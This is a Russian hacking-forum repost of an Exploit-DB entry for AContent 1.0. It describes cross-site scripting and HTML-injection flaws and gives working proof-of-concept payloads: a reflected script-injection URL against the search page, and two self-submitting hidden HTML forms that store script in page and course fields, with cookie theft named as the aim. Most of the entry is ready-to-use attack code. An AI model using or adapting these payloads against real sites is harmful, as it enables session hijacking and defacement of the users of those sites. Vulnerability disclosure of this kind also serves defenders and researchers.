Exploit AContent 1.0 - Cross-Site Scripting / HTML Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34629
Проверка EDB
  1. Пройдено
Автор
HIGH-TECH BRIDGE SA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-09-15
AContent 1.0 - Cross-Site Scripting / HTML Injection
Код:
source: https://www.securityfocus.com/bid/43238/info

AContent is prone to multiple cross-site scripting vulnerabilities and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

AContent 1.0 is vulnerable; prior versions may also be affected.

http://www.example.com/home/search.php?search_text=txt"><script>alert(document.cookie)</script>&catid=&search=Search


<form action="http://www.example.com/home/editor/edit_content.php?_cid=PAGE_ID" method="post" name="main" enctype="multipart/form-data" >

<input type="hidden" name="_course_id" value="54" />
<input type="hidden" name="_cid" value="PAGE_ID" />
<input type="hidden" name="title" value="page title" />
<input type="hidden" name="ordering" value="1" />
<input type="hidden" name="pid" value="0" />
<input type="hidden" name="alternatives" value="" />
<input type="hidden" name="current_tab" value="0" />
<input type="hidden" name="keywords" value="" />
<input type="hidden" name="test_message" value="" />
<input type="submit" name="submit" id="sbmtit" value="Save" />
<input type="hidden" name="displayhead" value="0" />
<input type="hidden" name="displaypaste" value="0" />
<input type="hidden" name="complexeditor" value="1" />
<input type="hidden" name="title" value="atest ah" />
<input type="hidden" name="formatting" value="1" />
<input type="hidden" name="head" value="" />
<input type="hidden" name="uploadedfile_paste" value="" />
<input type="hidden" name="body_text" value='hello world html<script>alert(document.cookie)</script>' />
<input type="hidden" name="weblink_text" value="" />

</form>
<script>
document.getElementById('sbmtit').click();
</script>


<form action="http://www.example.com/home/course/course_property.php?_course_id=COURSE_ID" method="post" name="main" enctype="multipart/form-data" >

<input type="hidden" name="_course_id" value="COURSE_ID" />
<input type="hidden" name="title" value="Creating Lesson in AContent" />
<input type="hidden" name="category_id" value="0" />
<input type="hidden" name="pri_lang" value="en" />
<input type="hidden" name="description" value="Learn how to" />
<input type="hidden" name="copyright" value='1"><script>alert(document.cookie)</script>' />
<input type="submit" name="submit" id="sbmtit" value="Save" />

</form>
<script>
document.getElementById('sbmtit').click();
</script>
 
Источник
www.exploit-db.com

Похожие темы